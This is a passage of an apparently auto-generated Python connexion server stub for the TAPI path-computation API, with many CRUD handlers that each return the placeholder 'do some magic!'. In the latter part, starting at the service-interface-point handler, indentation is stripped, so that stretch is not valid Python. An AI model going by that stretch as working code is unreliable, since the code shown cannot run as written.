    return 'do some magic!'


def data_context_path_computation_context_path_comp_service_post(tapi_path_computation_path_computation_service=None):  # noqa: E501
    """data_context_path_computation_context_path_comp_service_post

    creates tapi.path.computation.PathComputationService # noqa: E501

    :param tapi_path_computation_path_computation_service: tapi.path.computation.PathComputationService to be added to list
    :type tapi_path_computation_path_computation_service: dict | bytes

    :rtype: None
    """
    if connexion.request.is_json:
        tapi_path_computation_path_computation_service = TapiPathComputationPathComputationService.from_dict(connexion.request.get_json())  # noqa: E501
    return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_delete(uuid):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_delete

    removes tapi.path.computation.PathComputationService # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str

    :rtype: None
    """
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_point_post(uuid, tapi_path_computation_path_service_end_point=None):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_point_post

    creates tapi.path.computation.PathServiceEndPoint # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param tapi_path_computation_path_service_end_point: tapi.path.computation.PathServiceEndPoint to be added to list
    :type tapi_path_computation_path_service_end_point: dict | bytes

    :rtype: None
    """
    if connexion.request.is_json:
        tapi_path_computation_path_service_end_point = TapiPathComputationPathServiceEndPoint.from_dict(connexion.request.get_json())  # noqa: E501
    return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_delete(uuid, local_id):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_delete

    removes tapi.common.CapacityValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str

    :rtype: None
    """
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_get(uuid, local_id):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_get

    returns tapi.common.CapacityValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str

    :rtype: TapiCommonCapacityValue
    """
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_post(uuid, local_id, tapi_common_capacity_value=None):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_post

    creates tapi.common.CapacityValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str
    :param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
    :type tapi_common_capacity_value: dict | bytes

    :rtype: None
    """
    if connexion.request.is_json:
        tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json())  # noqa: E501
    return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_put(uuid, local_id, tapi_common_capacity_value=None):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_put

    creates or updates tapi.common.CapacityValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str
    :param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
    :type tapi_common_capacity_value: dict | bytes

    :rtype: None
    """
    if connexion.request.is_json:
        tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json())  # noqa: E501
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_delete(uuid, local_id):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_delete

    removes tapi.common.CapacityValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str

    :rtype: None
    """
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_get(uuid, local_id):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_get

    returns tapi.common.CapacityValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str

    :rtype: TapiCommonCapacityValue
    """
    return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_post(uuid, local_id, tapi_common_capacity_value=None):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_post

    creates tapi.common.CapacityValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str
    :param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
    :type tapi_common_capacity_value: dict | bytes

    :rtype: None
    """
    if connexion.request.is_json:
        tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json())  # noqa: E501
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_put(uuid, local_id, tapi_common_capacity_value=None):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_put

    creates or updates tapi.common.CapacityValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str
    :param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
    :type tapi_common_capacity_value: dict | bytes

    :rtype: None
    """
    if connexion.request.is_json:
        tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json())  # noqa: E501
    return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_delete(uuid, local_id):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_delete

    removes tapi.common.BandwidthProfile # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str

    :rtype: None
    """
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_get(uuid, local_id):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_get

    returns tapi.common.BandwidthProfile # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str

    :rtype: TapiCommonBandwidthProfile
    """
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_delete(uuid, local_id):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_delete

    removes tapi.common.CapacityValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str

    :rtype: None
    """
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_get(uuid, local_id):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_get

    returns tapi.common.CapacityValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str

    :rtype: TapiCommonCapacityValue
    """
    return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_post(uuid, local_id, tapi_common_capacity_value=None):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_post

    creates tapi.common.CapacityValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str
    :param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
    :type tapi_common_capacity_value: dict | bytes

    :rtype: None
    """
    if connexion.request.is_json:
        tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json())  # noqa: E501
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_put(uuid, local_id, tapi_common_capacity_value=None):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_put

    creates or updates tapi.common.CapacityValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str
    :param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
    :type tapi_common_capacity_value: dict | bytes

    :rtype: None
    """
    if connexion.request.is_json:
        tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json())  # noqa: E501
    return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_delete(uuid, local_id):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_delete

    removes tapi.common.CapacityValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str

    :rtype: None
    """
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_get(uuid, local_id):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_get

    returns tapi.common.CapacityValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str

    :rtype: TapiCommonCapacityValue
    """
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_post(uuid, local_id, tapi_common_capacity_value=None):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_post

    creates tapi.common.CapacityValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str
    :param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
    :type tapi_common_capacity_value: dict | bytes

    :rtype: None
    """
    if connexion.request.is_json:
        tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json())  # noqa: E501
    return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_put(uuid, local_id, tapi_common_capacity_value=None):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_put

    creates or updates tapi.common.CapacityValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str
    :param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
    :type tapi_common_capacity_value: dict | bytes

    :rtype: None
    """
    if connexion.request.is_json:
        tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json())  # noqa: E501
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_post(uuid, local_id, tapi_common_bandwidth_profile=None):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_post

    creates tapi.common.BandwidthProfile # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str
    :param tapi_common_bandwidth_profile: tapi.common.BandwidthProfile to be added to list
    :type tapi_common_bandwidth_profile: dict | bytes

    :rtype: None
    """
    if connexion.request.is_json:
        tapi_common_bandwidth_profile = TapiCommonBandwidthProfile.from_dict(connexion.request.get_json())  # noqa: E501
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_put(uuid, local_id, tapi_common_bandwidth_profile=None):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_put

    creates or updates tapi.common.BandwidthProfile # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str
    :param tapi_common_bandwidth_profile: tapi.common.BandwidthProfile to be added or updated
    :type tapi_common_bandwidth_profile: dict | bytes

    :rtype: None
    """
    if connexion.request.is_json:
        tapi_common_bandwidth_profile = TapiCommonBandwidthProfile.from_dict(connexion.request.get_json())  # noqa: E501
    return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_delete(uuid, local_id):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_delete

    removes tapi.common.Capacity # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str

    :rtype: None
    """
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_get(uuid, local_id):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_get

    returns tapi.common.Capacity # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str

    :rtype: TapiCommonCapacity
    """
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_post(uuid, local_id, tapi_common_capacity=None):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_post

    creates tapi.common.Capacity # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str
    :param tapi_common_capacity: tapi.common.Capacity to be added to list
    :type tapi_common_capacity: dict | bytes

    :rtype: None
    """
    if connexion.request.is_json:
        tapi_common_capacity = TapiCommonCapacity.from_dict(connexion.request.get_json())  # noqa: E501
    return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_put(uuid, local_id, tapi_common_capacity=None):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_put

    creates or updates tapi.common.Capacity # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str
    :param tapi_common_capacity: tapi.common.Capacity to be added or updated
    :type tapi_common_capacity: dict | bytes

    :rtype: None
    """
    if connexion.request.is_json:
        tapi_common_capacity = TapiCommonCapacity.from_dict(connexion.request.get_json())  # noqa: E501
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_total_size_delete(uuid, local_id):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_total_size_delete

    removes tapi.common.CapacityValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str

    :rtype: None
    """
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_total_size_get(uuid, local_id):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_total_size_get

    returns tapi.common.CapacityValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str

    :rtype: TapiCommonCapacityValue
    """
    return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_total_size_post(uuid, local_id, tapi_common_capacity_value=None):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_total_size_post

    creates tapi.common.CapacityValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str
    :param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
    :type tapi_common_capacity_value: dict | bytes

    :rtype: None
    """
    if connexion.request.is_json:
        tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json())  # noqa: E501
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_total_size_put(uuid, local_id, tapi_common_capacity_value=None):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_capacity_total_size_put

    creates or updates tapi.common.CapacityValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str
    :param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
    :type tapi_common_capacity_value: dict | bytes

    :rtype: None
    """
    if connexion.request.is_json:
        tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json())  # noqa: E501
    return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_delete(uuid, local_id):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_delete

    removes tapi.path.computation.PathServiceEndPoint # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str

    :rtype: None
    """
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_get(uuid, local_id):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_get

    returns tapi.path.computation.PathServiceEndPoint # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str

    :rtype: TapiPathComputationPathServiceEndPoint
    """
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_name_post(uuid, local_id, tapi_common_name_and_value=None):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_name_post

    creates tapi.common.NameAndValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str
    :param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
    :type tapi_common_name_and_value: dict | bytes

    :rtype: None
    """
    if connexion.request.is_json:
        tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json())  # noqa: E501
    return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_namevalue_name_delete(uuid, local_id, value_name):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_namevalue_name_delete

    removes tapi.common.NameAndValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str
    :param value_name: Id of name
    :type value_name: str

    :rtype: None
    """
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_namevalue_name_get(uuid, local_id, value_name):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_namevalue_name_get

    returns tapi.common.NameAndValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str
    :param value_name: Id of name
    :type value_name: str

    :rtype: TapiCommonNameAndValue
    """
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_namevalue_name_post(uuid, local_id, value_name, tapi_common_name_and_value=None):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_namevalue_name_post

    creates tapi.common.NameAndValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str
    :param value_name: Id of name
    :type value_name: str
    :param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
    :type tapi_common_name_and_value: dict | bytes

    :rtype: None
    """
    if connexion.request.is_json:
        tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json())  # noqa: E501
    return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_namevalue_name_put(uuid, local_id, value_name, tapi_common_name_and_value=None):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_namevalue_name_put

    creates or updates tapi.common.NameAndValue # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str
    :param value_name: Id of name
    :type value_name: str
    :param tapi_common_name_and_value: tapi.common.NameAndValue to be added or updated
    :type tapi_common_name_and_value: dict | bytes

    :rtype: None
    """
    if connexion.request.is_json:
        tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json())  # noqa: E501
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_post(uuid, local_id, tapi_path_computation_path_service_end_point=None):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_post

    creates tapi.path.computation.PathServiceEndPoint # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str
    :param tapi_path_computation_path_service_end_point: tapi.path.computation.PathServiceEndPoint to be added to list
    :type tapi_path_computation_path_service_end_point: dict | bytes

    :rtype: None
    """
    if connexion.request.is_json:
        tapi_path_computation_path_service_end_point = TapiPathComputationPathServiceEndPoint.from_dict(connexion.request.get_json())  # noqa: E501
    return 'do some magic!'


def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_put(uuid, local_id, tapi_path_computation_path_service_end_point=None):  # noqa: E501
    """data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_put

    creates or updates tapi.path.computation.PathServiceEndPoint # noqa: E501

    :param uuid: Id of path-comp-service
    :type uuid: str
    :param local_id: Id of end-point
    :type local_id: str
    :param tapi_path_computation_path_service_end_point: tapi.path.computation.PathServiceEndPoint to be added or updated
    :type tapi_path_computation_path_service_end_point: dict | bytes

    :rtype: None
    """
    if connexion.request.is_json:
        tapi_path_computation_path_service_end_point = TapiPathComputationPathServiceEndPoint.from_dict(connexion.request.get_json())  # noqa: E501
    return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_service_interface_point_get(uuid, local_id): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_end_pointlocal_id_service_interface_point_get
returns tapi.common.ServiceInterfacePointRef # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonServiceInterfacePointRef
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_get(uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_get
returns tapi.path.computation.PathComputationService # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:rtype: TapiPathComputationPathComputationService
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_name_post(uuid, tapi_common_name_and_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_name_post
creates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_namevalue_name_delete(uuid, value_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_namevalue_name_delete
removes tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_namevalue_name_get(uuid, value_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_namevalue_name_post(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_namevalue_name_post
creates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_namevalue_name_put(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_namevalue_name_put
creates or updates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added or updated
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_objective_function_delete(uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_objective_function_delete
removes tapi.path.computation.PathObjectiveFunction # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_objective_function_get(uuid): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_objective_function_get
returns tapi.path.computation.PathObjectiveFunction # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:rtype: TapiPathComputationPathObjectiveFunction
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_objective_function_name_post(uuid, tapi_common_name_and_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_objective_function_name_post
creates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_objective_function_namevalue_name_delete(uuid, value_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_objective_function_namevalue_name_delete
removes tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_objective_function_namevalue_name_get(uuid, value_name): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_objective_function_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_objective_function_namevalue_name_post(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_objective_function_namevalue_name_post
creates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_objective_function_namevalue_name_put(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_objective_function_namevalue_name_put
creates or updates tapi.common.NameAndValue # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param value_name: Id of name
:type value_name: str
:param tapi_common_name_and_value: tapi.common.NameAndValue to be added or updated
:type tapi_common_name_and_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_objective_function_post(uuid, tapi_path_computation_path_objective_function=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_objective_function_post
creates tapi.path.computation.PathObjectiveFunction # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_path_computation_path_objective_function: tapi.path.computation.PathObjectiveFunction to be added to list
:type tapi_path_computation_path_objective_function: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_path_computation_path_objective_function = TapiPathComputationPathObjectiveFunction.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_path_computation_context_path_comp_serviceuuid_objective_function_put(uuid, tapi_path_computation_path_objective_function=None): # noqa: E501
"""data_context_path_computation_context_path_comp_serviceuuid_objective_function_put
creates or updates tapi.path.computation.PathObjectiveFunction # noqa: E501
:param uuid: Id of path-comp-service
:type uuid: str
:param tapi_path_computation_path_objective_function: tapi.path.computation.PathObjectiveFunction to be added or updated
:type tapi_path_computation_path_objective_function: dict | bytes
